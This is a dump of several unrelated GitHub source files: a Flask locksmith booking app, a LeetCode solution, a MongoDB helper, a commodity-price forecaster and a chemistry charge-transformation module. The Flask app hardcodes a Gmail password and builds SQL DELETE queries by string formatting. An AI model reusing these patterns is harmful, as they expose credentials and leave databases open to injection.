(user, passw))\n            session['user'] = user\n            mysql.connection.commit()\n\n            if filas == 0 :\n                #request.form['Username'] != 'correo' 
or request.form['Password'] != 'pass':\n error = 'Datos invalido'\n flash('Correo o contraseña invalida')\n else:\n return redirect(url_for('protected1'))\n \n return render_template('loging.html', error=error)\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Sesion\n\n@app.route('/protected')\ndef protected():\n if g.user:\n flash('Administrador')\n return render_template('homeadmin.html')\n\n return redirect(url_for('home'))\n\n@app.before_request\ndef before_request():\n g.user = None\n if 'user' in session:\n g.user = session['user']\n\n\n@app.route('/getsession')\ndef getsession():\n if 'user' in session:\n return session['user']\n\n return 'No estas iniciando'\n\n@app.route('/dropsession')\ndef dropsession():\n session.pop('user', None)\n return 'Tramposo!'\n\n@app.route('/logout')\ndef logout():\n if session['user'] == 'admin':\n session['admin']=''\n session.pop('user', None)\n flash('Cerro sesión')\n return redirect(url_for('home'))\n\n@app.route('/protected1')\ndef protected1():\n if g.user:\n flash(g.user)\n return render_template('homeusua.html')\n return redirect(url_for('home'))\n\n@app.route('/logout1')\ndef logout1():\n session.pop('user', None)\n flash('Cerro sesión')\n return redirect(url_for('home'))\n#--- ---- ---- ---- ----- ------ ------- ------ ----- ------ --------- ------ ------ ------- ------ ------ \n\n #Insertar datos a MYSQL\n\n@app.route('/reservacarro', methods = ['POST'])\ndef reservacarro():\n\n if request.method == 'POST':\n\n Marca = request.form['Marca']\n Modelo = request.form['Modelo']\n Ubicacion = request.form['Ubicacion']\n Correo = request.form['Correo']\n Tipo_trabajo = request.form['Tipo_trabajo']\n Fecha = request.form['Fecha']\n if (Marca == '' or Modelo == '' or Ubicacion == '' or Correo == '' or Tipo_trabajo == '' or Fecha == ''):\n flash('Campos vacios')\n return render_template('reserva-carro.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO reservacarro (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo, Fecha) VALUES (%s, %s, %s, %s, %s, %s)', (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo, Fecha))\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n # Aviso al correo\n\n message = 'Tienes una reserva para un auto, revise los datos del cliente en el sitio web'\n subject = 'RESERVA PARA AUTO'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n mysql.connection.commit()\n flash('¡Reserva registrada!')\n return render_template('homeusua.html')\n\n@app.route('/reservacasa', methods = ['GET', 'POST'])\ndef reservacasa():\n\n if request.method == 'POST':\n\n Domicilio = request.form['Domicilio']\n Numero = request.form['Numero']\n Correo = request.form['Correo']\n Referencia = request.form['Referencia']\n Tipo_trabajo = request.form['Tipo_trabajo']\n Fecha = request.form['Fecha']\n if (Domicilio == '' or Numero == '' or Correo == '' or Referencia == '' or Tipo_trabajo == '' or Fecha == ''):\n flash('Campos vacios')\n return render_template('reserva-casa.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO reservacasa (Domicilio, Numero, Correo, Referencias, Tipo_trabajo, Fecha) VALUES (%s, %s, %s, %s, %s, %s)', (Domicilio, Numero, Correo, Referencia, Tipo_trabajo, Fecha))\n \n # Aviso al correo\n 
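# the lines below open Gmail's SMTP relay on port 587, upgrade the connection with starttls(), and send a plain-text notice; hardcoded credentials like these are unsafe outside a demo\n        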
message = 'Tienes una reserva para una casa, revise los datos del cliente en el sitio web'\n subject = 'RESERVA PARA CASA'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n\n mysql.connection.commit()\n flash('¡Reserva registrada!') \n return render_template('homeusua.html')\n\n@app.route('/consultacarro', methods = ['GET', 'POST'])\ndef consultacarro():\n\n if request.method == 'POST':\n\n\n Marca = request.form['marca']\n Modelo = request.form['Modelo']\n Ubicacion = request.form['Ubicacion']\n Correo = request.form['Correo']\n Tipo_trabajo = request.form['Tipo_trabajo']\n if (Modelo == '' or Marca == '' or Ubicacion == '' or Correo == '' or Tipo_trabajo == ''):\n flash('Campos vacios')\n return render_template('consulta-carro.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO consultacarro (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo) VALUES (%s, %s, %s, %s, %s)', (Marca, Modelo, Ubicacion, Correo, Tipo_trabajo))\n \n # Aviso al correo\n message = 'Tienes una consulta para una casa, revise los datos del cliente en el sitio web'\n subject = 'CONSULTA PARA CARRO'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n \n mysql.connection.commit()\n flash('¡Consulta registrada!') \n return render_template('homeusua.html')\n\n@app.route('/consultacasa', methods = ['GET', 'POST'])\ndef consultacasa():\n\n if request.method == 'POST':\n\n Domicilio = request.form['Domicilio']\n Numero = request.form['Numero']\n Correo = request.form['Correo']\n Referencia = request.form['Referencia']\n Tipo_trabajo = request.form['Tipo_trabajo']\n if (Domicilio == '' or Numero == '' or Correo == '' or Referencia == '' or Tipo_trabajo == ''):\n flash('Campos vacios')\n return render_template('consulta-casa.html')\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO consultacasa (Domicilio, Numero, Correo, Referencias, Tipo_trabajo) VALUES (%s, %s, %s, %s, %s)', (Domicilio, Numero, Correo, Referencia, Tipo_trabajo))\n \n # Aviso al correo\n message = 'Tienes una consulta para una casa, revise los datos del cliente en el sitio web'\n subject = 'CONSULTA PARA CASA'\n message = 'Subject: {}\\n\\n{}'.format(subject, message)\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.starttls()\n server.login('linacerrajeria@gmail.com', 'Asdf1234zxcv')\n server.sendmail('linacerrajeria@gmail.com', 'linacerrajeria@gmail.com', message)\n server.quit()\n \n mysql.connection.commit()\n flash('¡Consulta registrada!') \n print('hola') \n return render_template('homeusua.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Borrar datos de MYSQL\n\n@app.route('/delete/')\ndef delete_contact(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM reservacarro WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('admincar'))\n\n@app.route('/delete1/')\ndef delete_contact1(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM reservacasa WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto 
Eliminado')\n return redirect(url_for('admincas'))\n\n@app.route('/delete2/')\ndef delete_contact2(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM consultacarro WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('adminconscar'))\n\n@app.route('/delete3/')\ndef delete_contact3(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM consultacasa WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('adminconscas'))\n\n@app.route('/delete4/')\ndef delete_contact4(id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM usuario WHERE Id = {0}' .format(id))\n mysql.connection.commit()\n flash('Contacto Eliminado')\n return redirect(url_for('usuarios'))\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n #Denegar accesos\n\n\n\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Tzintzunjhonna/cerrajeria","sub_path":"cerr.py","file_name":"cerr.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42600829073","text":"'''\nhttps://leetcode.com/problems/add-strings/\nRuntime: 392 ms, faster than 5.24% of Python3 online submissions for Add Strings.\nMemory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Add Strings.\n'''\n\nclass Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n int1, int2 = 0, 0\n len1, len2 = len(num1), len(num2)\n \n for i in range(len1):\n int1 += (ord(num1[i]) - 48) * pow(10,(len1 - 1) - i)\n\n for i in range(len2):\n int2 += (ord(num2[i]) - 48) * pow(10,(len2 - 1) - i)\n \n return str(int1 + int2)","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/easy/415_add_strings/django.py","file_name":"django.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"41109667861","text":"import pymongo\nfrom enum1 import Status\nfrom dotenv import load_dotenv\nimport os \n\nload_dotenv()\nlink=os.getenv(\"mongodb\")\nclient=pymongo.MongoClient(link)\ndb =client['Job_search']\njob=db['total_jobs']\napplyjobs=db['applied_jobs']\nlogin=db['login_details']\nstatus=db['status_details']\n\n\n\ndef create_job(data):\n data=dict(data)\n job.insert_one(data)\n\ndef apply_job(data):\n data=dict(data)\n applyjobs.insert_one(data)\n status.insert_one(\n { \"name\" : data[\"name\"],\n \"status\" : Status.under_process}\n )\n\n \n\n","repo_name":"kasojusrujan/Job_application_with_Fastapi","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8795416150","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy.linalg import norm\nfrom scipy.spatial import distance\nfrom scipy.spatial.transform import Rotation as Kabsch\n\nfrom Cube import read_cube\n\nBOHR_TO_ANGSTROM = 0.529177\n\n\ndef angle(a, b, c):\n ba = a - b\n bc = c - b\n cosine_angle = np.dot(ba, bc) / (np.linalg.norm(ba) * np.linalg.norm(bc))\n a3 = np.degrees(np.arccos(cosine_angle))\n return a3\n\n\n# This is the straightforward approach as outlined in the answers to\n# \"How do I calculate 
a dihedral angle given Cartesian coordinates?\"\ndef dihedral2(p):\n b = p[:-1] - p[1:]\n b[0] *= -1\n v = np.array([v - (v.dot(b[1]) / b[1].dot(b[1])) * b[1] for v in [b[0], b[2]]])\n # Normalize vectors\n v /= np.sqrt(np.einsum('...i,...i', v, v)).reshape(-1, 1)\n b1 = b[1] / np.linalg.norm(b[1])\n x = np.dot(v[0], v[1])\n m = np.cross(v[0], b1)\n y = np.dot(m, v[1])\n return np.degrees(np.arctan2(y, x))\n\n\ndef read_cube_file(filepath):\n pcube_data, pcube_meta = read_cube(filepath)\n ap = []\n an = []\n for i in pcube_meta[\"atoms\"]:\n atom = list(i[1])\n ap.append([x * BOHR_TO_ANGSTROM for x in atom[1:]])\n an.append(atom[1])\n return ap, an\n\n\ndef read_mdcm_xyz(filepath):\n xyz_file = open(filepath).readlines()\n n_charges = int(xyz_file[0])\n # read number of charges from first line (xyz format)\n charge_lines = xyz_file[2:n_charges + 2]\n # Read atoms and charges\n c_positions = []\n c_charges = []\n for charge in charge_lines:\n on, x, y, z, c = charge.split()\n c_positions.append([float(x), float(y), float(z)])\n c_charges.append(float(c))\n return c_positions, c_charges\n\n\ndef get_local_axis(atom_pos, frame_atoms, method=\"bond\"):\n \"\"\"\n method: \"bond\" z-axis a-b\n \"bisector\" z-axis = bisector of a-b,b-c\n Inputs:\n atom_positions, frames\n Returns:\n List of Lists of Frame Vectors [ [x_v, y_v, z_v], ... ] in order of frames\n \"\"\"\n n_frames = len(frame_atoms)\n frame_vectors = []\n for f in range(n_frames):\n a_index, b_index, c_index = frame_atoms[f]\n a, b, c = frame_atoms[f]\n # adjust indexing\n a = atom_pos[a - 1]\n b = atom_pos[b - 1]\n c = atom_pos[c - 1]\n distance_ab = distance.euclidean(a, b)\n b1_x = (a[0] - b[0]) / distance_ab\n b1_y = (a[1] - b[1]) / distance_ab\n b1_z = (a[2] - b[2]) / distance_ab\n\n distance_bc = distance.euclidean(c, b)\n b2_x = (c[0] - b[0]) / distance_bc\n b2_y = (c[1] - b[1]) / distance_bc\n b2_z = (c[2] - b[2]) / distance_bc\n\n # Z axes\n ez1 = np.array([b1_x, b1_y, b1_z])\n ez3 = np.array([b2_x, b2_y, b2_z])\n\n if method == \"bond\":\n ez2 = np.array([b1_x, b1_y, b1_z])\n\n elif method == \"bisector\":\n \"\"\" Calculate Z(2) as bisector\n \"\"\"\n bi_x = ez1[0] + ez3[0]\n bi_y = ez1[1] + ez3[1]\n bi_z = ez1[2] + ez3[2]\n\n # get norm\n r_bi = np.sqrt(bi_x ** 2 + bi_y ** 2 + bi_z ** 2)\n # normalize\n ez2 = np.array([bi_x, bi_y, bi_z]) / r_bi\n\n if r_bi < 0.0001:\n print(\"Colinearity detected! 
(Bad)\")\n\n else:\n assert False, \"No valid method supplied!\"\n\n # Y axes\n ey1 = np.zeros(3)\n ey1[0] = b1_y * b2_z - b1_z * b2_y\n ey1[1] = b1_z * b2_x - b1_x * b2_z\n ey1[2] = b1_x * b2_y - b1_y * b2_x\n re_x = np.sqrt(ey1[0] ** 2 + ey1[1] ** 2 + ey1[2] ** 2)\n\n # left handed axes system\n ey1[0] = -1 * ey1[0] / re_x\n ey1[1] = -1 * ey1[1] / re_x\n ey1[2] = -1 * ey1[2] / re_x\n\n ey2 = ey1.copy()\n ey3 = ey1.copy()\n\n # X axes\n # ex1 and ex2\n ex1 = np.cross(ey1, ez1)\n if method == \"bond\":\n ex2 = ex1.copy()\n else:\n ex2 = np.cross(ey2, ez2)\n # ex3\n ex3 = np.cross(ey3, ez3)\n frame_vectors.append((np.array([ex1, -1 * ey1, ez1]),\n np.array([ex2, -1 * ey2, ez2]),\n np.array([ex3, -1 * ey3, ez3])))\n\n # print(frame_vectors[-1])\n\n return frame_vectors\n\n\ndef save_charges(charge_positions, charges, filename=\"out_charges.xyz\"):\n print(filename)\n file = open(filename, \"w\")\n file.write(\"{}\\n\".format(len(charge_positions)))\n file.write(\"s x[A] y[A] z[A] \"\n \" q[e]\\n\")\n c = 1\n for xyz, q in zip(charge_positions, charges):\n c += 1\n if q < 0:\n letter = \"O\"\n else:\n letter = \"N\"\n file.write(\"{0:} {1:.16f} {2:.16f} {3:.16f} {4:.16f}\\n\".format(letter, xyz[0],\n xyz[1], xyz[2], float(q)))\n file.close()\n\n\nclass ARS():\n def __init__(self, xyz_file_name, pcube, frame_file, pcube_2=None, method=\"bond\", atom_charge_match=None):\n self.method = method\n self.c_positions_local = None\n self.c_positions_global = None\n self.atom_positions = None\n self.atom_positions_plus = None\n\n # Open XYZ file\n self.c_positions, self.c_charges = read_mdcm_xyz(xyz_file_name)\n self.n_charges = len(self.c_charges)\n\n # Open Cube files\n self.atom_positions, self.atom_names = read_cube_file(pcube)\n self.n_atoms = len(self.atom_names)\n\n if pcube_2 is not None:\n self.atom_positions_plus, atom_names = read_cube_file(pcube_2)\n self.n_atoms_2 = len(atom_names)\n\n # Test for consistency\n # self.test()\n\n # Get frames\n self.frame = open(frame_file).readlines()\n self.frame_atoms = []\n self.frames = self.frame[1:]\n self.n_frames = len(self.frames)\n for f in self.frames:\n _s = f.split()\n a1 = f.split()[0]\n a2 = f.split()[1]\n a3 = f.split()[2]\n self.frame_atoms.append([int(a1), int(a2), int(a3)])\n\n # Match charges to closest atoms\n if atom_charge_match is None:\n self.charge_atom_associations, self.atom_charge_dict = self.match_charges()\n self.save_charge_atom_associations()\n else:\n self.read_charge_atom_associations(atom_charge_match)\n\n # print(self.charge_atom_associations)\n # print(self.match_charges()[0])\n\n # Calculate local axes and transform charges\n # Calculate the new axes for each frame\n self.atom_positions = np.array(self.atom_positions)\n\n if pcube_2 is not None:\n self.atom_positions_plus = np.array(self.atom_positions_plus)\n\n self.frame_vectors = get_local_axis(self.atom_positions, self.frame_atoms, method=self.method)\n\n if pcube_2 is not None:\n self.frame_vectors_plus = get_local_axis(self.atom_positions_plus, self.frame_atoms, method=self.method)\n\n self.c_positions_local = self.global_to_local()\n\n if pcube_2 is not None:\n self.charge_positions_plus = self.local_to_global()\n\n def save_charge_atom_associations(self, filename=\"out.acd\"):\n f = open(filename+\".acd\", \"w\")\n for charge, atom in self.charge_atom_associations:\n f.write(f\"{charge} {atom} \\n\")\n f.close()\n\n def read_charge_atom_associations(self, path):\n f = open(path).readlines()\n charge_atom_associations = []\n atom_charge_dict = {}\n for i, line 
in enumerate(f):\n c, a = line.split()\n c_a = [int(c), int(a)]\n charge_atom_associations.append(c_a)\n c = c_a[0]\n a = c_a[1]\n if a not in atom_charge_dict:\n atom_charge_dict[a] = [c]\n else:\n atom_charge_dict[a].append(c)\n self.charge_atom_associations = charge_atom_associations\n self.atom_charge_dict = atom_charge_dict\n\n def get_angle(self, a, b, c):\n atoms = self.atom_positions\n p = np.array([atoms[a], atoms[b], atoms[c]])\n return angle(*p)\n\n def get_dih(self, a, b, c, d):\n atoms = self.atom_positions\n p = np.array([atoms[a], atoms[b], atoms[c], atoms[d]])\n return dihedral2(p)\n\n def get_dih_2(self, a, b, c, d):\n atoms = self.atom_positions_plus\n p = np.array([atoms[a], atoms[b], atoms[c], atoms[d]])\n return dihedral2(p)\n\n # def align_in_global(self, filename_template=None):\n # self.rotation, rmsd = Kabsch.align_vectors(self.atom_positions, self.atom_positions_plus)\n # self.rotation = self.rotation.as_matrix()\n # tmp_atom_positions = self.rotation.dot(self.atom_positions.T).T\n # if filename_template is None:\n # save_xyz(tmp_atom_positions, self.atom_names)\n # else:\n # save_xyz(tmp_atom_positions, self.atom_names, filename=filename_template.format(\"molecule\"))\n # tmp_charge_positions = self.rotation.dot(self.c_positions.T).T\n # if filename_template is None:\n # save_charges(tmp_charge_positions, self.c_charges)\n # else:\n # save_charges(tmp_charge_positions, self.c_charges, filename=filename_template.format(\"charges\"))\n #\n # print(rmsd)\n\n def get_c_positions_local(self):\n return self.c_positions_local\n\n def plot1(self):\n plot_labels = False\n plot_pos_1 = True\n plot_pos_2 = True\n plot_vectors = False\n\n fig = plt.figure()\n ax = Axes3D(fig, elev=0, azim=60)\n # Transpose to the right shape for plotting\n a_p = np.array(self.atom_positions).T\n a_p1 = np.array(self.atom_positions_plus).T\n c_p = np.array(self.c_positions).T\n c_p_l = np.array(self.c_positions_local).T\n c_p_g = np.array(self.c_positions_global).T\n # Plotting axes\n if plot_vectors:\n for frame_vec in self.frame_vectors:\n for il, local_vector_i in enumerate(frame_vec):\n atom_index = self.frame_atoms[0][il] - 1\n self.plot_axe(il, local_vector_i, atom_index)\n # Plotting points\n if plot_pos_1:\n ax.plot(a_p[0], a_p[1], a_p[2], c='gray', linestyle='None', marker=\"o\")\n ax.plot(c_p[0], c_p[1], c_p[2], marker=\"o\", c='orange', linestyle='None', alpha=0.8)\n if plot_labels:\n label = ['{:d}'.format(i) for i in range(self.n_charges)]\n for i, pos in enumerate(c_p.T):\n ax.text(pos[0], pos[1], pos[2], label[i])\n # ax.plot(c_p_l[0], c_p_l[1], c_p_l[2], marker=\"o\", c=\"g\", linestyle = 'None', alpha=0.8)\n # label = ['{:d}'.format(i) for i in range(n_charges)]\n # for i, pos in enumerate(c_p_l.T):\n # ax.text(pos[0], pos[1], pos[2], label[i])\n if plot_pos_2:\n ax.plot(a_p1[0], a_p1[1], a_p1[2], c='k', linestyle='None', marker=\"o\")\n ax.plot(c_p_g[0], c_p_g[1], c_p_g[2], marker=\"x\", c=\"r\", linestyle='None', alpha=0.8)\n if plot_labels:\n label = ['{:d}'.format(i) for i in range(self.n_charges)]\n for i, pos in enumerate(c_p_g.T):\n ax.text(pos[0], pos[1], pos[2], label[i])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.set_xlim(-1, 1)\n ax.set_ylim(-1, 1)\n ax.set_zlim(-1, 1)\n\n if plot_labels:\n plt.legend()\n\n plt.show()\n\n def plot_axe(self, il, local_vector, atom_index, c=\"k\"):\n atom_pos = self.atom_positions[atom_index]\n x = [atom_pos[0], atom_pos[0] + local_vector[0][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[0][1]]\n z = 
[atom_pos[2], atom_pos[2] + local_vector[0][2]]\n plt.plot(x, y, z, c='r', label=\"x\")\n x = [atom_pos[0], atom_pos[0] + local_vector[1][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[1][1]]\n z = [atom_pos[2], atom_pos[2] + local_vector[1][2]]\n plt.plot(x, y, z, '--g', label=\"y\")\n x = [atom_pos[0], atom_pos[0] + local_vector[2][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[2][1]]\n z = [atom_pos[2], atom_pos[2] + local_vector[2][2]]\n plt.plot(x, y, z, ':b', label=\"z\")\n print(\"check for orthogality: \", np.dot(local_vector[2], local_vector[0]))\n\n def match_charges(self):\n # Match each charge to a nucleus\n charge_atom_associations = []\n atom_charge_dict = {}\n for i_charge in range(self.n_charges):\n # initial distance, which can be compared to find smaller values\n min_distance = np.Inf\n atom_association = None\n for j_atom in range(self.n_atoms):\n d = distance.euclidean(self.c_positions[i_charge], self.atom_positions[j_atom])\n if d < min_distance:\n atom_association = j_atom\n min_distance = d\n charge_atom_associations.append([i_charge, atom_association])\n\n if atom_association not in list(atom_charge_dict.keys()):\n atom_charge_dict[atom_association] = [i_charge]\n else:\n atom_charge_dict[atom_association].append(i_charge)\n return charge_atom_associations, atom_charge_dict\n\n def global_to_local(self):\n # Find the position of the charges in the local axes\n # Create a new array for the 'local' charges\n c_pos_shape = np.array(self.c_positions).shape\n c_positions_local = np.zeros(c_pos_shape)\n\n used_atoms = []\n for f in range(self.n_frames):\n # Loop through the atoms in the frame\n for ai, atom_index in enumerate(self.frame_atoms[f]):\n atom_index -= 1\n if atom_index in list(self.atom_charge_dict.keys()) and atom_index not in used_atoms:\n charges = self.atom_charge_dict[atom_index]\n ex, ey, ez = self.frame_vectors[f][ai]\n # Find the associated charges for that atom, and loop\n for charge in charges:\n c_pos_global = self.c_positions[charge]\n atom_pos_xyz = self.atom_positions[atom_index]\n\n # Find the distance between the charge and the atom it belongs to\n r = np.array(c_pos_global) - np.array(atom_pos_xyz)\n\n local_x_pos = np.dot(ex, r)\n local_y_pos = np.dot(ey, r)\n local_z_pos = np.dot(ez, r)\n\n c_positions_local[charge][0] = local_x_pos\n c_positions_local[charge][1] = local_y_pos\n c_positions_local[charge][2] = local_z_pos\n\n used_atoms.append(atom_index)\n\n return c_positions_local\n\n def save_charges_local(self, output_filename):\n # output_filename_split = output_filename.split(\"/\")\n # output_filename = \"local_\" + output_filename_split[-1]\n # output_filename = os.path.join(*output_filename_split[:-1], output_filename)\n save_charges(self.c_positions_local,\n self.c_charges, filename=output_filename + \".local\")\n\n def set_charge_positions_plus(self, charge_positions):\n self.charge_positions_plus = charge_positions\n\n def set_local_charge_positions(self, charge_positions):\n self.c_positions_local = charge_positions\n\n def save_charges_global(self, output_filename):\n save_charges(self.charge_positions_plus,\n self.c_charges, filename=output_filename + \".global\")\n\n def get_distance_charges(self):\n return Kabsch.align_vectors(self.charge_positions_plus, self.c_positions)[1]\n\n def get_distance_atoms(self):\n return Kabsch.align_vectors(self.atom_positions, self.atom_positions_plus)[1]\n\n def local_to_global(self):\n # Find the position of the charges in the local axes\n # Create a new array for the 'local' 
charges\n c_pos_shape = np.array(self.c_positions).shape\n c_new_local = np.zeros(c_pos_shape)\n c_positions_global = np.zeros(c_pos_shape)\n\n used_atoms = []\n for f in range(self.n_frames):\n # Loop through the atoms in the frame\n for ai, atom_index in enumerate(self.frame_atoms[f]):\n atom_index -= 1\n if atom_index in list(self.atom_charge_dict.keys()) and atom_index not in used_atoms:\n charges = self.atom_charge_dict[atom_index]\n ex, ey, ez = self.frame_vectors_plus[f][ai]\n # Find the associated charges for that atom, and loop\n for charge in charges:\n c_pos_local = self.c_positions_local[charge]\n atom_pos_xyz = self.atom_positions_plus[atom_index]\n\n c_l_x = c_pos_local[0]\n c_l_y = c_pos_local[1]\n c_l_z = c_pos_local[2]\n\n print(atom_index, charge)\n print(c_l_x, c_l_y, c_l_z)\n print(ex)\n print(ey)\n print(ez)\n\n x_vec = np.multiply(ex, c_l_x)\n y_vec = np.multiply(ey, c_l_y)\n z_vec = np.multiply(ez, c_l_z)\n #\n sum_of_components = x_vec + y_vec + z_vec\n # translate back to the center of atoms (for the new conformation)\n c_positions_global[charge] = sum_of_components + atom_pos_xyz\n\n used_atoms.append(atom_index)\n return c_positions_global\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='ARS')\n parser.add_argument('-charges', help='.')\n parser.add_argument('-pcube', help='.')\n parser.add_argument('-pcube2', help='.', default=None)\n parser.add_argument('-frames', help='.')\n parser.add_argument('-output', help='.')\n parser.add_argument('-acd', help='.', default=None)\n\n args = parser.parse_args()\n print(' '.join(f'{k}={v}\\n' for k, v in vars(args).items()))\n\n ARS_obj = ARS(args.charges, args.pcube, args.frames, pcube_2=args.pcube2, method=\"bond\", atom_charge_match=args.acd)\n if args.pcube2 is not None:\n ARS_obj.save_charges_global(args.output)\n\n ARS_obj.save_charges_local(args.output)\n ARS_obj.save_charge_atom_associations(filename=args.output)\n\n if args.pcube2 is not None:\n print(f\"RMSD_ATOMS = {ARS_obj.get_distance_atoms()}\")\n print(f\"RMSD_CHARGES = {ARS_obj.get_distance_charges()}\")\n\n # dih = False\n # if len(sys.argv) > 6:\n # dih = [int(x) for x in sys.argv[6].split(\"_\")]\n\n # if dih:\n # dihedral = ARS_obj.get_dih_2(*dih)\n # print(f\"Dihedral {dih} = {dihedral}\")\n","repo_name":"EricBoittier/fdcm_project","sub_path":"ARS.py","file_name":"ARS.py","file_ext":"py","file_size_in_byte":19046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17085869727","text":"import requests\nimport lxml.html\nimport pandas as pd\nimport fbprophet\nimport matplotlib.pyplot as plt\n\nBASE_URL = 'https://www.indexmundi.com/commodities/'\n\n\ndef get_prices(commodities, months=360):\n params = {\n 'months': months,\n 'commodity': commodities\n }\n resp = requests.get(BASE_URL, params=params)\n html = lxml.html.fromstring(resp.content)\n if len(params['commodity']) == 2:\n correlation = html.cssselect('#lblPct')[0].text.split(': ')[-1]\n correlation = float(correlation)\n table = html.cssselect('#gvPrices')[0]\n headers = [e.text for e in table.cssselect('th')]\n\n # skip first row (header)\n rows = [[try_float(t.text) for t in e.cssselect('td')] for e in table.cssselect('tr')[1:]]\n return pd.DataFrame(columns=headers, data=rows)\n\n\ndef train_model(df, y_col, dt_col='Month', extra_cols=None):\n extra_cols = extra_cols or []\n df['ds'] = pd.to_datetime(df[dt_col])\n df['y'] = df[y_col]\n\n model = fbprophet.Prophet(weekly_seasonality=False, 
daily_seasonality=False, yearly_seasonality=False)\n for col in extra_cols:\n model.add_regressor(col)\n model.fit(df)\n return model\n\n\ndef try_float(v):\n \"\"\"try converting a string\n value to a float. will try to\n handle percentage strings too.\n if the value can't be converted to a float,\n just return the original value.\"\"\"\n v = v.strip()\n if v.endswith('%'):\n return float(v[:-1])/100\n try:\n return float(v)\n except ValueError:\n return v\n\n\nif __name__ == '__main__':\n commodities = [\n 'corn',\n 'beef',\n 'wheat',\n 'oranges',\n 'cheese'\n ]\n df = get_prices(['rock-phosphate'])\n model = train_model(df, 'Price')\n\n # df = get_prices(['rock-phosphate', 'beef'])\n # beef = 'Beef Price (US Dollars per Kilogram)'\n # phos = 'Rock Phosphate Price (US Dollars per Metric Ton)'\n # model = train_model(df, beef, extra_cols=[phos])\n\n # plt.plot(df['ds'], df['y'])\n # plt.show()\n\n future = model.make_future_dataframe(periods=365, freq='M')\n # import ipdb; ipdb.set_trace()\n forecast = model.predict(future)\n model.plot(forecast)\n plt.show()","repo_name":"frnsys/phospho","sub_path":"forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5362481270","text":"# -*- coding: utf-8 -*- \n\n\"\"\"\nMethods that has nos direct relation\nwith the ui\n\"\"\"\nimport os\nfrom PyQt4 import QtGui, QtCore\n\nfrom arnold import *\nclass CoreFunctions(QtCore.QThread):\n renderSignal = QtCore.pyqtSignal()\n def __init__(self):\n QtCore.QThread.__init__(self)\n self.r = self.g = self.b = 100\n self.log=None \n self.image_path = None\n\n def createSphere(self):\n # create a sphere geometric primitive\n self.sphere = AiNode(\"sphere\")\n AiNodeSetStr(self.sphere, \"name\", \"geo_sphere\")\n AiNodeSetVec(self.sphere, \"center\", 0.0, 0.0, 0.0)\n AiNodeSetFlt(self.sphere, \"radius\", 6.0)\n\n # create a red standard shader\n self.shader = AiNode(\"standard\")\n AiNodeSetStr(self.shader, \"name\", \"ai_shader\")\n AiNodeSetRGB(self.shader, \n \"Kd_color\", self.r, \n self.g, self.b)\n AiNodeSetFlt(self.shader, \"Ks\", 0.01)\n\n # assign the shaders to the geometric objects\n AiNodeSetPtr(self.sphere, \"shader\", self.shader)\n\n def createCamera(self):\n \"\"\"\n Create camera\n \"\"\"\n self.camera = AiNode(\"persp_camera\")\n AiNodeSetStr(self.camera, \"name\", \"cam\")\n # Camera position\n AiNodeSetVec(self.camera, \"position\", 0.0, 0.0, 40.0)\n AiNodeSetVec(self.camera, \"look_at\", 0.0, 0.0, 0.0)\n 